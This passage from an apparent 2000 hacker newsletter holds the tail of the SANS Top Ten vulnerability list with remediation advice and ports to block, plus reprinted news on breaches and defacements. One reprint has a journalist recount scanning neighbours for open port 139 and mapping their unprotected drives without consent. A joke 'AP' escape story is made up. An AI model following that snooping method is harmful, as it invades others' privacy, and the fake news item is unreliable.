Apache server) CVE-1999-0068 ('mylog.html' sample script shipped with the PHP/FI) CVE-1999-0270 (IRIX 6.2, IRIX 6.3, IRIX 6.4) CVE-1999-0346 (sample script shipped with the PHP/FI package) CVE-2000-0207 (IRIX 6.5) Most important CGI Vulnerabilities not including sample programs CAN-1999-0467 (WebCom Guestbook CGI) ** CAN-1999-0509 (All CGI Web Servers) Refer to http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html Remedy: The solution to this problem is to ensure that the CGI bin directory does not include any general-purpose interpreters, for example PERL Tcl UNIX shells (sh, csh, ksh, etc.) CVE-1999-0021 (Muhammad A. Muquit's wwwcount version 2.3) CVE-1999-0039 (Outbox Environment Subsystem for IRIX) CVE-1999-0058 (PHP/FI package written by Rasmus Lerdorf) CVE-1999-0147 (Glimpse HTTP 2.0 and WebGlimpse) CVE-1999-0148 (Outbox Environment Subsystem for IRIX) CVE-1999-0149 (Outbox Environment Subsystem for IRIX) ** CVE-1999-0174 (All CGI Web Servers) Refer to, http://xforce.iss.net/static/291.php (More info at http://www.netspace.org/cgi-bin/wa?A2=ind9702B&L=bugtraq&P=R64 ) Remedy: Remove the "view-source" script from the cgi-bin directory on your web server. CVE-1999-0177 (O'Reilly Website 2.0 and earlier CGI) CVE-1999-0178 (O'Reilly Website 2.0 and earlier CGI) CVE-1999-0237 (Webcom's CGI Guestbook for Win32 web servers) CVE-1999-0262 (fax survey CGI script on Linux ) CVE-1999-0279 (Excite for Web Servers) CVE-1999-0771 (Compaq Management Agents and the Compaq Survey Utility) CVE-1999-0951 (OmniHTTPd CGI program) CVE-2000-0012 (MS SQL CGI program) CVE-2000-0039 (AltaVista search engine) CVE-2000-0208 (htsearch CGI script for ht://dig) ColdFusion Sample Program Vulnerabilities ** CAN-1999-0455 ** CAN-1999-0922 ** CAN-1999-0923 ColdFusion Other Vulnerability ** CAN-1999-0760 ** CVE-2000-0057 Advice on correcting the problem: A. Do not run web servers as root B. Get rid of CGI script interpreters in bin directories: http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html C. Remove unsafe CGI scripts http://www.cert.org/advisories/CA-97.07.nph-test-cgi_script.html http://www.cert.org/advisories/CA-96.06.cgi_example_code.html http://www.cert.org/advisories/CA-97.12.webdist.html D. Write safer CGI programs: http://www-4.ibm.com/software/developer/library/secure-cgi/ http://www.cert.org/tech_tips/cgi_metacharacters.html http://www.cert.org/advisories/CA-97.24.Count_cgi.html E. Don't configure CGI support on Web servers that don't need it. F. Run your Web server in a chroot()ed environment to protect the machine against yet to be discovered exploits 3. Remote Procedure Call (RPC) weaknesses in rpc.ttdbserverd (ToolTalk), rpc.cmsd (Calendar Manager), and rpc.statd that allow immediate root compromise Remote procedure calls (RPC) allow programs on one computer to execute programs on a second computer. They are widely-used to access network services such as shared files in NFS. Multiple vulnerabilities caused by flaws in RPC, are being actively exploited. There is compelling evidence that the vast majority of the distributed denial of service attacks launched during 1999 and early 2000 were executed by systems that had been victimized because they had the RPC vulnerabilities. The broadly successful attack on U.S. military systems during the Solar Sunrise incident also exploited an RPC flaw found on hundreds of Department of Defense systems. Systems Affected: Multiple UNIX and Linux systems CVE Entries: rpc.ttdbserverd - CVE-1999-0687, CVE-1999-0003, CVE-1999-0693 (-0687 is newer than -0003, but both allow root from remote attackers and it's likely that -0003 is still around a LOT; -0693 is only locally exploitable, but does give root) rpc.cmsd CVE-1999-0696 rpc.statd - CVE-1999-0018, CVE-1999-0019. Advice on correcting the problem: A. Wherever possible, turn off and/or remove these services on machines directly accessible from the Internet. B. Where you must run them, install the latest patches: For Solaris Software Patches: http://sunsolve.sun.com For IBM AIX Software http://techsupport.services.ibm.com/support/rs6000.support/downloads http://techsupport.services.ibm.com/rs6k/fixes.html For SGI Software Patches: http://support.sgi.com/ For Compaq (Digital Unix) Patches: http://www.compaq.com/support Search the vendor patch database for tooltalk patches and install them right away. A summary document pointing to specific guidance about each of three principal RPC vulnerabilities may be found at: http://www.cert.org/incident_notes/IN-99-04.html For statdd: http://www.cert.org/advisories/CA-99-05-statd-automountd.html For ToolTalk: http://www.cert.org/advisories/CA-98.11.tooltalk.html For Calendar Manager: http://www.cert.org/advisories/CA-99-08-cmsd.html 4. RDS security hole in the Microsoft Internet Information Server (IIS) Microsoft’s Internet Information Server (IIS) is the web server software found on most web sites deployed on Microsoft Windows NT and Windows 2000 servers. Programming flaws in IIS’s Remote Data Services (RDS) are being employed by malicious users to run remote commands with administrator privileges. Some participants who developed the "Top Ten" list believe that exploits of other IIS flaws, such as .HTR files, are at least as common as exploits of RDS. Prudence dictates that organizations using IIS install patches or upgrades to correct all known IIS security flaws when they install patches or upgrades to fix the RDS flaw. Systems Affected: Microsoft Windows NT systems using Internet Information Server CVE Entries: CVE-1999-1011 Advice on correcting the problem: An outstanding guide to the RDS weakness and how to correct it may be found at: http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2 B. Microsoft has also posted relevant information at: http://support.microsoft.com/support/kb/articles/q184/3/75.asp http://www.microsoft.com/technet/security/bulletin/ms98-004.asp http://www.microsoft.com/technet/security/bulletin/ms99-025.asp 5. Sendmail buffer overflow weaknesses, pipe attacks and MIMEbo, that allow immediate root compromise. Sendmail is the program that sends, receives, and forwards most electronic mail processed on UNIX and Linux computers. Sendmail’s widespread use on the Internet makes it a prime target of attackers. Several flaws have been found over the years. The very first advisory issued by CERT/CC in 1988 made reference to an exploitable weakness in sendmail. In one of the most common exploits, the attacker sends a crafted mail message to the machine running Sendmail, and Sendmail reads the message as instructions requiring the victim machine to send its password file to the attacker’s machine (or to another victim) where the passwords can be cracked. Systems Affected: Multiple UNIX and Linux systems CVE Entries: CVE-1999-0047, CVE-1999-0130, CVE-1999-0131, CVE-1999-0203, CVE-1999-0204, CVE-1999-0206. CVE-1999-0130 is locally exploitable only. Advice on correcting the problem: A. Upgrade to latest version of Sendmail and/or implement patches for sendmail. See http://www.cert.org/advisories/CA-97.05.sendmail.html B. Do not run Sendmail in daemon mode (turn off the -bd switch) on machines that are neither mail servers nor mail relays. 6. sadmind and mountd Sadmind allows remote administration access to Solaris systems, providing graphical access to system administration functions. Mountd controls and arbitrates access to NFS mounts on UNIX hosts. Buffer overflows in these applications can be exploited allowing attackers to gain control with root access. Systems Affected: Multiple UNIX and Linux systems Sadmind: Solaris machines only CVE Entries: sadmind - CVE-1999-0977 mountd - CVE-1999-0002. Advice on correcting the problem: A. Wherever possible, turn off and/or remove these services on machines directly accessible from the Internet. B. Install the latest patches: For Solaris Software Patches: http://sunsolve.sun.com For IBM AIX Software http://techsupport.services.ibm.com/support/rs6000.support/downloads http://techsupport.services.ibm.com/rs6k/fixes.html For SGI Software Patches: http://support.sgi.com/ For Compaq (Digital Unix) Patches: http://www.compaq.com/support C. More guidance at: http://www.cert.org/advisories/CA-99-16-sadmind.html http://www.cert.org/advisories/CA-98.12.mountd.html 7. Global file sharing and inappropriate information sharing via NetBIOS and Windows NT ports 135->139 (445 in Windows2000), or UNIX NFS exports on port 2049, or Macintosh Web sharing or AppleShare/IP on ports 80, 427, and 548. These services allow file sharing over networks. When improperly configured, they can expose critical system files or give full file system access to any hostile party connected to the network. Many computer owners and administrators use these services to make their file systems readable and writeable in an effort to improve the convenience of data access. Administrators of a government computer site used for software development for mission planning made their files world readable so people at a different government facility could get easy access. Within two days, other people had discovered the open file shares and stolen the mission planning software. When file sharing is enabled on Windows machines they become vulnerable to both information theft and certain types of quick-moving viruses. A recently released virus called the 911 Worm uses file shares on Windows 95 and 98 systems to propagate and causes the victim’s computer to dial 911 on its modem. Macintosh computers are also vulnerable to file sharing exploits. The same NetBIOS mechanisms that permit Windows File Sharing may also be used to enumerate sensitive system information from NT systems. User and Group information (usernames, last logon dates, password policy, RAS information), system information, and certain Registry keys may be accessed via a "null session" connection to the NetBIOS Session Service. This information is typically used to mount a password guessing or brute force password attack against the NT target. Systems Affected: UNIX, Windows, and Macintosh systems. CVE Entries: SMB shares with poor access control - CAN-1999-0520 NFS exports to the world - CAN-1999-0554 These candidate entries are likely to change significantly before being accepted as full CVE entries. Advice on correcting the problem: A. When sharing mounted drives, ensure only required directories are shared. B. For added security, allow sharing only to specific IP addresses because DNS names can be spoofed. C. For Windows systems, ensure all shares are protected with strong passwords. D. For Windows NT systems, prevent anonymous enumeration of users, groups, system configuration and registry keys via the "null session" connection. Block inbound connections to the NetBIOS Session Service (tcp 139) at the router or the NT host. Consider implementing the RestrictAnonymous registry key for Internet-connected hosts in standalone or non-trusted domain environments: NT4: http://support.microsoft.com/support/kb/articles/Q143/4/74.asp Win2000: http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP E. A quick, free, and secure test for the presence of NetBIOS file sharing, and its related vulnerabilities, effective for machines running ANY operating system, is available at the Gibson Research Corporation web site. Simply visit http://grc.com/ and click the "ShieldsUP" icon to receive a real-time appraisal of any system's NetBIOS exposure. Detailed instructions are available to help Microsoft Windows users deal with NetBIOS vulnerabilities. F. For Macintosh systems, disable file sharing and web sharing extensions unless absolutely required. If file sharing must be enabled, ensure strong passwords for access, and stop file sharing during periods in which it is not required. To permanently disable Web sharing in MacOS 8 or MacOS 9, remove two files and restart: System Folder:Control Panels:Web Sharing System Folder:Extensions:Web Sharing Extension To permanently disable AppleShare/IP in MacOS 9, remove one file and restart: System Folder:Extensions:Shareway IP Personal Bgnd 8. User IDs, especially root/administrator with no passwords or weak passwords. Some systems come with "demo" or "guest" accounts with no passwords or with widely-known default passwords. Service workers often leave maintenance accounts with no passwords, and some database management systems install administration accounts with default passwords. In addition, busy system administrators often select system passwords that are easily guessable ("love," "money," "wizard" are common) or just use a blank password. Default passwords provide effortless access for attackers. Many attackers try default passwords and then try to guess passwords before resorting to more sophisticated methods. Compromised user accounts get the attackers inside the firewall and inside the target machine. Once inside, most attackers can use widely-accessible exploits to gain root or administrator access. Systems Affected: All systems. CVE Entries: Unix guessable (weak) password - CAN-1999-0501 Unix default or blank password - CAN-1999-0502 NT guessable (weak) password - CAN-1999-0503 NT default or blank password - CAN-1999-0504 These candidate entries are likely to change significantly before being accepted as full CVE entries. Advice on correcting the problem: A. Create an acceptable password policy including assigned responsibility and frequency for verifying password quality. Ensure senior executives are not exempted. Also include in the policy a requirement to change all default passwords before attaching computers to the Internet, with substantial penalties for non-compliance. B1. VERY IMPORTANT! Obtain written authority to test passwords B2. Test passwords with password cracking programs: For Windows NT: l0pthcrack http://www.l0pht.com For UNIX: Crack http://www.users.dircon.co.uk/~crypto C. Implement utilities that check passwords when created. For UNIX: Npasswd, http://www.utexas.edu/cc/unix/software/npasswd For Windows NT: http://support.microsoft.com/support/kb/articles/Q161/9/90.asp D. Force passwords to expire periodically (at a frequency established in your security policy). E. Maintain password histories so users cannot recycle old passwords. Additional information may be found at: http://www.cert.org/tech_tips/passwd_file_protection.html http://www.cert.org/incident_notes/IN-98.03.html http://www.cert.org/incident_notes/IN-98.01.irix.html 9. IMAP and POP buffer overflow vulnerabilities or incorrect configuration. IMAP and POP are popular remote access mail protocols, allowing users to access their e-mail accounts from internal and external networks. The "open access" nature of these services makes them especially vulnerable to exploitation because openings are frequently left in firewalls to allow for external e-mail access. Attackers who exploit flaws in IMAP or POP often gain instant root-level control. Systems Affected: Multiple UNIX and Linux systems CVE Entries: CVE-1999-0005, CVE-1999-0006, CVE-1999-0042, CVE-1999-0920, CVE-2000-0091 Advice on correcting the problem: A. Disable these services on machines that are not e-mail servers. B. Use the latest patches and versions. Additional information may be found at: http://www.cert.org/advisories/CA-98.09.imapd.html http://www.cert.org/advisories/CA-98.08.qpopper_vul.html http://www.cert.org/advisories/CA-97.09.imap_pop.html C. Some of the experts also recommend controlling access to these services using TCP wrappers and encrypted channels such as SSH and SSL to protect passwords. 10. Default SNMP community strings set to ‘public’ and ‘private.’ The Simple Network Management Protocol (SNMP) is widely used by network administrators to monitor and administer all types of network-connected devices ranging from routers to printers to computers. SNMP uses an unencrypted "community string" as its only authentication mechanism. Lack of encryption is bad enough, but the default community string used by the vast majority of SNMP devices is "public", with a few "clever" network equipment vendors changing the string to "private". Attackers can use this vulnerability in SNMP to reconfigure or shut down devices remotely. Sniffed SNMP traffic can reveal a great deal about the structure of your network, as well as the systems and devices attached to it. Intruders use such information to pick targets and plan attacks. Systems Affected: All system and network devices. CVE Entries: default or blank SNMP community name (public) - CAN-1999-0517 guessable SNMP community name - CAN-1999-0516 hidden SNMP community strings - CAN-1999-0254, CAN-1999-0186 These candidate entries are likely to change significantly before being accepted as full CVE entries. Advice on correcting the problem: A. If you do not absolutely require SNMP, disable it. B. If you are using SNMP, use the same policy for community names as used for passwords described in Vulnerability Cluster Number 8 above. C. Validate and check community names using snmpwalk. D. Where possible make MIBs read only. Additional information: http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315 A High Priority Bonus Item for Windows Users and Administrators: Various Scripting Holes in Internet Explorer and Office2000 Recent virus attacks have illustrated how macro and script code could spread easily through e-mail attachments, and people were admonished to avoid opening potentially dangerous attachments. However, Windows users can also spread malicious viruses without opening attachments. Microsoft Outlook and Outlook Express will execute HTML and script code in an e-mail in their default installations. In addition, several so-called ActiveX components are incorrectly executable from an e-mail containing HTML and script code. Some of the vulnerable controls include the Scriplet. typlib (ships with IE 4.x and 5.x) and the UA control (Office 2000). Other vulnerabilities arising from the use of Active Scripting are that an e-mail could be used to install new software on a users computer. A relatively benign virus known as the kak worm is already spreading through these mechanisms. A malicious version of kak can be anticipated at any time. We recommend that all users and administrators set Outlook and Outlook Express to read e-mail in the "Restricted Sites Zone" and then further disable all Active Scripting and ActiveX related settings in that zone. This is done in the Options dialog's Security tab, but can be automated using System Policies. Microsoft has made patches available for the individual problems and is readying a patch which will set the security settings in Outlook, but apparently has no plans on fixing Outlook Express. Systems Affected: All Windows systems with Internet Explorer 4.x and 5.x (even if it is not used) or Office 2000. Windows 2000 is not affected by some of the IE issues. CVE Entries: CVE-1999-0668 CAN-2000-0329 Advice on correcting the problem: http://www.microsoft.com/security/bulletins/ms99-032.asp http://www.microsoft.com/security/bulletins/MS99-048.asp http://www.microsoft.com/technet/security/bulletin/MS00-034.asp The fixes for the particular vulnerabilities discussed here are available from: http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm http://officeupdate.microsoft.com/info/ocx.htm Set your Security Zone to restricted sites and then disable all active content in that zone. Apply the patch to Outlook as soon as it becomes available at: http://www.officeupdate.com/2000/articles/out2ksecarticle.htm Updating your virus detection software, while important, is not a complete solution for this problem. You must also correct the flaws in Microsoft's software. Perimeter Protection For An Added Layer of Defense In Depth In this section, we list ports that are commonly probed and attacked. Blocking these ports is a minimum requirement for perimeter security, not a comprehensive firewall specification list. A far better rule is to block all unused ports. And even if you believe these ports are blocked, you should still actively monitor them to detect intrusion attempts. A warning is also in order. Blocking some of the ports in the following list may disable needed services. Please consider the potential effects of these recommendations before implementing them. Block "spoofed" addresses-- packets coming from outside your company sourced from internal addresses or private (RFC1918 and network 127) addresses. Also block source routed packets. Login services-- telnet (23/tcp), SSH (22/tcp), FTP (21/tcp), NetBIOS (139/tcp), rlogin et al (512/tcp through 514/tcp) RPC and NFS-- Portmap/rpcbind (111/tcp and 111/udp), NFS (2049/tcp and 2049/udp), lockd (4045/tcp and 4045/udp) NetBIOS in Windows NT -- 135 (tcp and udp), 137 (udp), 138 (udp), 139 (tcp). Windows 2000 earlier ports plus 445(tcp and udp) X Windows -- 6000/tcp through 6255/tcp Naming services-- DNS (53/udp) to all machines which are not DNS servers, DNS zone transfers (53/tcp) except from external secondaries, LDAP (389/tcp and 389/udp) Mail-- SMTP (25/tcp) to all machines, which are not external mail relays, POP (109/tcp and 110/tcp), IMAP (143/tcp) Web-- HTTP (80/tcp) and SSL (443/tcp) except to external Web servers, may also want to block common high-order HTTP port choices (8000/tcp, 8080/tcp, 8888/tcp, etc.) "Small Services"-- ports below 20/tcp and 20/udp, time (37/tcp and 37/udp) Miscellaneous-- TFTP (69/udp), finger (79/tcp), NNTP (119/tcp), NTP (123/tcp), LPD (515/tcp), syslog (514/udp), SNMP (161/tcp and 161/udp, 162/tcp and 162/udp), BGP (179/tcp), SOCKS (1080/tcp) ICMP-- block incoming echo request (ping and Windows traceroute), block outgoing echo replies, time exceeded, and destination unreachable messages except "packet too big" messages (type 3, code 4). (This item assumes that you are willing to forego the legitimate uses of ICMP echo request in order to block some known malicious uses.) Signatories: Randy Marchany, Virginia Tech Scott Conti, University of Massachusetts Matt Bishop, University of California, Davis Sten Drescher, Tivoli Systems Lance Spitzner, Sun Microsystems GESS Security Team Alan Paller, SANS Institute Stephen Northcutt, SANS Institute Eric Cole, SANS Institute Gene Spafford, Purdue University CERIAS Jim Ransome, Pilot Network Services Frank Swift, Pilot Network Services Jim Magdych, Network Associates, Inc. Jimmy Kuo, Network Associates, Inc. Igor Gashinsky, NetSec, Inc. Greg Shipley, Neohapsis Tony Sager, National Security Agency Larry Merritt, National Security Agency Bill Hill, MITRE Steve Christey, MITRE Viriya Upatising, Loxley Information Services Co. Marcus Sachs, JTF-CND, US Department of Defense Billy Austin, Intrusion.com Christopher W. Klaus, Internet Security Systems Wayne Stenson, Honeywell Martin Roesch, Hiverworld, Inc. Jeff Stutzman, Healthcare ISAC Ed Skoudis, Global Integrity Gene Schultz, Global Integrity Kelly Cooper, Genuity Eric Schultze, Foundstone Bill Hancock, Exodus Communications Ron Nguyen, Ernst & Young Lee Brotzman, NASIRC, Allied Technology Group, Inc. Scott Lawler, DoD Cert Hal Pomeranz, Deer Run Associates Chris Brenton, Dartmouth Institute for Security Studies Bruce Schneier, Counterpane Internet Security, Inc. Nick FitzGerald, Computer Virus Consulting Ltd. Shawn Hernan, CERT Coordination Center Kathy Fithen, CERT Coordination Center Derek Simmel, Carnegie Mellon University Jesper Johansson, Boston University Dave Mann, BindView Rob Clyde, Axent David Nolan, Arch Paging Mudge, @stake The following is a list of people who have helped make this document better through their contributions: Robert Harris © 2000 SANS Institute : Office 301.951.0102 : Registration 719.599.4303 : Web Contact scott@sans.org @HWA 258.0 [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AP: New w0rld Media Exclusive to the Norton Rambler Tony Crosslink reports. Justin Tanner had been spending time in prison wisely, by incorporating secret yoga techniques and remaining on a diet of only his own urine insects and St Johns Wort with ginseng snaps was able to lose weight and gain the dexterity necessary to hide his body in the cavity of his wooden leg.. "It appeared to be just laying there by itself, I assumed Mr Tanner was in the excercise yard" said a bewildered prison guard. The guard 50 yr old Cliff Draper had picked up the apparently mislaid prosthetic and moved it unaware of the concealed Tanner to an unsecured location. After waiting 4 hrs cramped inside the leg hollow of the limb he squeezed out just before clamp down and made good his escape in a laundry hamper. AP @HWA 259.0 [IND] Peeping Through Port 139 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 2 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060500a_j.shtml 6/2/00 Peeping Through Port 139 I couldn't believe it. There, before me on my computer screen, was a directory filled with family photos, labeled by name. I could have looked at pictures of these folks if I'd cared to. It wasn't my family, though, and these photos weren't on my computer. I had no idea whose computer they were on, but I guessed it was someone in my apartment building, and that they hadn't a clue I was spying on them. Many of us here in my building get Internet access through cable modems. Few know of the security risks. Now that high-speed access to the Internet can be had through cable and digital subscriber lines (DSL), security holes are easier to exploit. They're easy to fix too, but few are, probably because few people know about the breaches in the first place. Certainly, the cable guy who hooked me up never told me that Windows, in effect, offers an Internet party line to my hard drive. I'm guessing that at least three of my neighbors weren't informed either. How easy is it to tap into a neighbor's computer if it isn't secured properly? Insanely easy, I learned after a recent night of experimenting. It doesn't take any networking savvy -- just the right program and some anti-social attitude. One such program is called SMBScanner. It took me about 10 minutes to find on the Internet. Like a police scanner monitoring many frequencies, this software rolls through Internet-protocol (IP) numbers (Internet addresses of nine digits separated by periods, the online equivalent to phone numbers), checking for open ports on computers. Now, a cable company like the one I use usually reserves blocks of successive IP numbers for customer use. So I figured my neighbors would have numbers nearly identical to mine, probably varying only in the last two digits. SMBScanner paid a visit to each of these addresses, checking to see if port 139 -- the connection point computers often use to network with one another -- was open. Within minutes, it found three. From there, it was just a matter of employing the operating system's user-friendly ability to "map" another computer's hard drive to its own file system. This was a snap, given that two of the three computers had no password protection whatsoever. One poor user actually had a printer online. I pondered printing him or her a page reading YOU'VE BEEN HACKED! But what good would such a missive be if I couldn't enjoy the other person's surprise upon receiving it? Anyway, it was probably best to remain in stealth mode for this fact-finding mission. So I mapped someone else's C drive instead, giving me access to its contents. And that's when I found the directory named "Family Photos." That's also when I chickened out. I couldn't nerve myself up to actually look at any of the snapshots. I felt guilty enough already for having snooped this far. So I disconnected. My point was made. I didn't actually want to peer into somebody else's computer; I just wanted to see if I could do it. Anyone who has a high-speed Internet connection (and wants to avoid having done to them what I nearly did to my neighbors) should take the ShieldsUp security test offered by the Gibson Research Corp. (GRC, grc.com), run by computer guru Steve Gibson. It's where I learned about these vulnerabilities. GRC's Web site tests your computer to see what ports it can wiggle into. It's an eyeopener. How does this happen? It's a weird amalgamation of factors, a snafu that only surfaces when home networking, dedicated Internet lines, and people's steadfast refusal to use passwords are combined. Start with someone tying two computers together. According to GRC, when "Microsoft's networking client is installed, a default setting which would have protected many millions of computers if it were normally set to 'off' is instead set to 'on.'" Upshot? A home network is left open to the entire Internet. What is odd about this is that it is totally unnecessary. This option was set to "on" only to save Microsoft in customer-service calls, the Gibson site contends. Until recently, the pitfalls of home networking were limited, as most networked Netters went online with dial-up connections, which were assigned IPs more randomly. They remained online for limited periods of time and so were harder to pinpoint. But as more people set up networks and use connections that are always "on," it is starting to make for a lot of sitting ducks. And there are a lot of clandestine hunters out there. Here are computers that remain online for long stretches of time, with easily discoverable IP numbers. What better place than on somebody else's computer to spend some time nosing around, looking for free software or just some neighborly dish? I asked a system administrator who used to work for one of Baltimore's Internet service providers how much port-scanning he used to see. "The amount was staggering," he responded by e-mail -- about once a minute, some unknown computer cracker would test the lines, looking for an in. The friend's employer blocked that sort of traffic from reaching its customers, at least that from folks with other ISPs. It didn't stop this company's customers from snooping on each other, though, as I'd snooped on my neighbors. GRC provides an easy explanation of how to secure port 139. All it involves is a few points and clicks. The biggest challenge is letting people know. C Y B E R P U N K By Joab Jackson http://www.citypaper.com/2000-05-03/cyber.html Just like reverse TV: joabj@charm.net. @HWA 260.0 [IND] Hacker Hits Road Runner Server; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 2 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060500b_j.shtml 6/2/00 Hacker Hits Road Runner Server; Subscribers Need New Passwords Houston subscribers to Time Warner Communications' Road Runner cable-modem Internet service were told Thursday night to change their passwords after a hacker broke into an e-mail server. But a glitch in a computer prevented customers from making the change Thursday evening. Spokeswoman Kimberly Maki said the hacker may have gotten access to a database of e-mail logons and passwords on Wednesday. Road Runner technicians noted suspicious activity on the network and disabled the hacker's cable modem about 30 minutes after the intrusion started, she said. The hacker tried to come back in via the Internet later and was stopped again. Maki said technicians would complete a planned upgrade of the Road Runner system Thursday night and use the opportunity to increase security. Customers were e-mailed instructions for changing their passwords on Thursday. A technical support staffer said Thursday the computer used to update customer information was down and likely would be back up sometime today. Maki said Road Runner managers believe they identified the hacker and notified law enforcement officials. By DWIGHT SILVERMAN Copyright 2000 Houston Chronicle June 1, 2000, 7:57PM http://www.chron.com/cs/CDA/story.hts/business/568293 @HWA 261.0 [IND] Swedish Hacker-Tracker Is FBI And Media Darling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200a_j.shtml 6/12/00 Swedish Hacker-Tracker Is FBI And Media Darling By Eva Sohlman STOCKHOLM (Reuters) Saturday June 10 10:26 PM ET- The FBI, desperate to track down the source of the ``Love Bug'' computer virus last month, turned to a shy 19-year-old Swedish student. Jonathan James came under the media spotlight after he helped the world's most famous crime-busting agency trace the origins of the virus that caused billions of dollars in damage to computers around the world. But right now he is more interested in getting through his school exams and enrolling in law school later this year. In recent weeks more than 150 foreign journalists have called James or traveled to his home -- a country cottage a short distance outside the university town of Uppsala -- to get his story. James is unfazed by the media attention. He is concentrating on finishing his school exams this month and is setting up a joint venture for computer security solutions. The journalists are not the only ones to court James. The U.S. Federal Bureau of Investigation (FBI) calls him several times a week to discuss security issues and ways of tracing computer hackers. The first time they contacted him, he said, was when he had tracked down the creator of the ``Melissa'' virus in 1999 -- something the FBI still have not acknowledged officially. ``Well, I suppose it's hard to admit someone else did their job,'' James told Reuters. He recalled how they seemed to expect him to be honored by their call and spoke to him condescendingly. ``But I called them by their first names and that cooled them down.'' James says he is not interested in hacking or computer games, and denied that he was working on a new virus. With the media frenzy surrounding ``Melissa'' still fresh in his mind, he told the FBI he would not help track the ``Love Bug'' when it emerged at the beginning of May. ``I had decided that this time they would have to do it on their own but then I had a few hours left over on the Sunday..., he said. James decided to try to find out who was behind the virus when another Swede pointed the finger at a German student. Within hours he had gathered information on some well-known hackers' styles of programming and found one which had elements in common with the ``Love Bug.'' The next day, the Washington Post, drawing on U.S. officials, reported James' findings as the most crucial and later in the day a 24-year-old Philippine computer student who had submitted a thesis describing a program similar to the virus, was arrested. The FBI had come to the same conclusion, James says. The only difference was that it had taken them days. U.S. security expert Richard M. Smith said many computer experts had taken part in the virus hunt but that James was the single most important player. ``Jonathan found extremely important clues and if he hadn't been around it would have taken some more days to find the guy,'' Smith said. International Top-Hacker Career Not On The Agenda But a career as a professional hacker, working for the world's most sophisticated intelligence services, does not appeal to James. ``I want to be my own boss and decide myself what I should or shouldn't do,'' he said. He will start law studies at university later this year. ``I've wanted to study law since I was nine -- even before I got into computers -- and I think it could be fruitful to combine it with computers.'' James says he is interested in security programming computers because it resembles the language studies that fascinate him. Studies in Greek, German, English and Latin help him to trace the origins of words -- something he says he enjoys while reading. The Swedish spy story writer Jan Guillou and American author John Grisham are his favorite writers. In the little spare time he has James practices martial arts, listens to all kinds of music, especially American hip-hop, and hangs out with his half-English family who have helped him keep his feet firmly on the ground during the media circus. He tells of the time a journalist from French television was standing outside his house at 9.30 in the morning and caught him in his underwear. ``I was only wearing boxer shorts and there she was. She never wanted to leave but just sat there on our sofa and left around one o'clock in the afternoon.'' Governments Lax On Security James said he could not understand computer crime or why some people seemed to get a thrill from it. ``It's just vanity that seems to drive those hackers,'' he said. He criticized governments for being too lax with security, adding that he had found a big security hole in the homepage of Sweden's ruling Social Democrats but it took three weeks before it was sorted out. He thinks worries about the security of on-line shopping are over-hyped because it is much harder to obtain credit card numbers without being traced than most people believe. On the other hand there is no such thing as a 100 percent safe Web site, he concluded. @HWA 262.0 [IND] Hackers Force HK Government Website to Shut Down Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 6/12/00 Hackers Force HK Government Website to Shut Down Again 8:49 Monday 12 June 2000 AFP HACKERS launched a further attack on a Hong Kong government website yesterday, forcing officials to close the site down for the second time in less than 24 hours, a spokesman said. The government decided to temporarily shut down the Interactive Government Services Directory website "to solve problems created by two defacement cases over the weekend'', it said in a statement. "We resumed service at 2 am today after a defacement yesterday, but the website was still subjected to further attacks,'' the government spokesman said yesterday. Hackers attacked the site in the afternoon following an attack on Saturday which forced the site to shut down for more than 10 hours. "The other government websites have not been affected,'' the spokesman said. "The outward symptoms of the two attacks are similar with the homepage being defaced and replaced by messages,'' he said. The government shut down the affected homepage yesterday after the messages "Own3d by the Crows'' and "hacked by O Analista'' were found posted on the site. Analista means analyst in Spanish. Police were investigating the case, the government statement said. The government successfully fended off two attempts to hack into its website last year. http://www.it.fairfax.com.au/breaking/20000612/A61920-2000Jun12.html @HWA 263.0 [IND] Dozens of Malaysian Political Web Sites Hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200c_j.shtml Dozens of Malaysian political Web sites hacked By The Associated Press Special to CNET News.com June 11, 2000, 8:45 a.m. PT KUALA LUMPUR, Malaysia--Hackers have broken into dozens of Malaysian political Web sites, leaving government officials and opposition leaders fuming today over images of rotting skulls and obscene messages. One vandal, calling himself "Xenophoria," attacked 21 pro-government Web sites, posting a list of demands for greater press freedom and an end to corruption. "Stop government intervention in media. Justice for all," the hacker wrote. Cyberspace has been a fierce battleground for Malaysian politics in the past year, with more than 100 anonymously run Web sites fueling debate over the country's leadership and laws. Opposition leaders rely heavily on the Internet to drum up support, because they say the tightly controlled mainstream press is biased. The government, however, often plays down the Internet's potential impact on voters in Malaysia, where many of the country's 22 million people live in rural areas with limited Internet access. Both sides have so far condemned the hacking, which apparently began Friday, and vow to expose the culprits. "We don't condone such foolish conduct," said Tian Chua, vice president of the opposition National Justice Party. "These are unreasonable acts of cowardice which benefit neither the government nor the opposition." A popular opposition Web site called "Laman Reformasi," or "Reformation Site," was reported to have been attacked first. The vandal, who identified himself as "Junior Hacker," posted several obscene pictures on the Web site, in an apparent reference to jailed politician Anwar Ibrahim, who is on trial for sodomy. Opposition loyalists retaliated by penetrating their rivals' Web sites and branding supporters of the government as "fanatics." Politics online surged shortly after Prime Minister Mahathir Mohamad sacked Anwar as his deputy in September 1998, calling him an immoral homosexual. Anwar was subsequently sentenced to six years in jail for corruption and faces another twenty years if convicted of sodomy. He claims Mahathir orchestrated a conspiracy to oust him. Copyright © 2000 Associated Press. All rights reserved. This material may not be published, 